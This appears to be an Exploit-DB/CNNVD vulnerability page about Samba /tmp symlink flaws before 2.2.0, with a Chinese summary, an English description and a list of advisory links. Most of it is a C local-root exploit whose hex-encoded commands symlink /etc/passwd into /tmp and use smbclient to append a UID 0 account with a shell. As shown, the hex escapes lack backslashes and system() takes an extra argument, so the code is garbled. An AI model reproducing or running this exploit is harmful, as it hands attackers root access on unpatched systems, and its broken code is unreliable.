https://www.exploit-db.com/exploits/20776
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-042

Samba2.2.0之前版本存在漏洞。本地攻击者可以借助使用(1)打印机队列查询，(2)smbclient中的更多命令，或(3)smbclient中的mput命令的链接攻击覆盖任意文件。

source: http://www.securityfocus.com/bid/2617/info

Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 

/*
 * Samba Server r00t exploit
 *
 * Scope: Local (this exploit) and posible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 *
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 *
 * Author:      Gabriel Maggiotti
 * Email:       [email protected]
 * Webpage:     http://qb0x.net
 */


#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
char inject1[]=
        "x2fx62x69x6ex2fx72x6dx20x2dx72x66x20x2f"
        "x74x6dx70x2fx78x2ex6cx6fx67";
char inject2[]=
        "x2fx62x69x6ex2fx6cx6ex20x2dx73x20x2fx65"
        "x74x63x2fx70x61x73x73x77x64x20x2fx74x6d"
        "x70x2fx78x2ex6cx6fx67";
char inject3a[100]=
        "x2fx75x73x72x2fx62x69x6ex2fx73x6dx62x63"
        "x6cx69x65x6ex74x20x2fx2fx6cx6fx63x61x6c"
        "x68x6fx73x74x2fx22xaxa";
char inject3b[]=
        "x3ax3ax30x3ax30x3ax3ax2fx3ax2fx62x69x6e"
        "x2fx73x68x5cx6ex22x20x2dx6ex20x2ex2ex2f"
        "x2ex2ex2fx2ex2ex2fx74x6dx70x2fx78x20x2d"
        "x4exa";

if(argc!=2){
        fprintf(stderr,"usage: %s <user>n",*argv);
        return 1;
        }
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

return 0;
}

来源:US-CERTVulnerabilityNote:VU#670568
名称:VU#670568
链接:http://www.kb.cert.org/vuls/id/670568
来源:DEBIAN
名称:DSA-048
链接:http://www.debian.org/security/2001/dsa-048
来源:CALDERA
名称:CSSA-2001-015.0
链接:http://www.caldera.com/support/security/advisories/CSSA-2001-015.0.txt
来源:BUGTRAQ
名称:20010418PROGENY-SA-2001-05:Samba/tmpvulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0326.html
来源:BUGTRAQ
名称:20010418TSLSA-#2001-0005-samba
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0319.html
来源:BUGTRAQ
名称:20010417Samba2.0.8securityfix
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0305.html
来源:BID
名称:2617
链接:http://www.securityfocus.com/bid/2617
来源:MANDRAKE
名称:MDKSA-2001:040
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-040.php3
来源:FREEBSD
名称:FreeBSD-SA-01:36
链接:http://archives.neohapsis.com/archives/freebsd/2001-04/0608.html
来源:CONECTIVA
名称:CLA-2001:395
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000395